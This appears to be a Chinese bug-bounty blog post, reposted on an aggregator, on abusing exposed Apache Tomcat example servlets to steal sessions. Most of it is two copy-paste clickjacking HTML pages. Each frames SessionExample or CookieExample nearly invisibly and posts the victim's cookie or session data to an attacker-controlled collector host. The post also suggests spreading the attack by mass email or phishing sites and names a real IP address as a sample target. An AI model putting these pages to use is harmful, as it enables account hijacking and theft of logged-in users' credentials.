挖洞经验之Tomcat Examples利用

Posted 火线Zone

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了挖洞经验之Tomcat Examples利用相关的知识,希望对你有一定的参考价值。

一、内容:挖洞经验 利用Tomcat Examples劫持任意账号,从而获得高危赏金

二、前提:如果当前系统刚好采用tomcat容器的cookie或者session进行

三、案例:

访问:http://**/examples/[1]

扫描目录发现存在 examples

  如果当前系统刚好采用tomcat容器的cookie或者session进行身份验证,利用点击劫持,那么是有机会劫持登陆用户的身份信息

常见的session路径:/examples/servlets/servlet/SessionExample

常见的Cookie路径:/examples/servlets/servlet/CookieExample

session劫持POC,保存为html:

<head>

<style>

iframe#fgframe {opacity:5%;}

</style>

</head>

<h1>LSP专用</h1>

<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>

<iframe id = "fgframe" height="650px" width="400px" src = "http://IP/examples/servlets/servlet/SessionExample">



</iframe>

<form action="http://xxxx.ceye.io" method="POST">

<div>

<lable for = "say"> 你敢弄不?</lable>

<textarea id = "cookie" name = "cookie" rows ="4" cols="50">

</textarea>

<div>

<div>

<button>点下就给个高危</button>

</div>

</form>

cookie劫持POC,保存为html:

<head>

<style>

iframe#fgframe {opacity:5%;}

</style>

</head>

<h1>LSP专用</h1>

<h2>只需要ctrl +c ;ctrl + v ;点击一下就可以了</h2>

<iframe id = "fgframe" height="650px" width="400px" src="http://IP/examples/servlets/servlet/CookieExample">



</iframe>

<form action="http://xxxx.ceye.io" method="POST">

<div>

<lable for = "say"> 你敢弄不?</lable>

<textarea id = "cookie" name = "cookie" rows ="4" cols="50">

</textarea>

<div>

<div>

<button>点下就给个高危</button>

</div>

</form>

最终效果:

成功劫持到信息!!!

四、技术点总结:

1、需要受害者先登陆系统,然后利用examples特性获取当前用户session或者cookie

2、利用点击劫持诱导用户做出操作,并将数据转发到自己的服务器上面

3、利用批量邮件或者钓鱼网站扩大危害

4、常见的session路径:/examples/servlets/servlet/SessionExample

5、常见的Cookie路径:/examples/servlets/servlet/CookieExample

漏洞参照:

https://hackerone.com/reports/674741

References

[1] http://**/examples/: http://117.186.248.41/examples


以上是关于挖洞经验之Tomcat Examples利用的主要内容,如果未能解决你的问题,请参考以下文章

挖洞经验 | 利用XSS和CSRF漏洞远程实现PayPal合作方网站未授权账户访问

挖洞经验 | 绕过WAF限制利用php:方法实现OOB-XXE漏洞利用

挖洞经验 从XSS漏洞到四步CSRF利用实现账户劫持

挖洞经验 | Facebook CDN服务器的XSS漏洞

挖洞经验之某次任意用户登录漏洞挖掘

挖洞经验 | 记一次有关参数指定型XSS的故事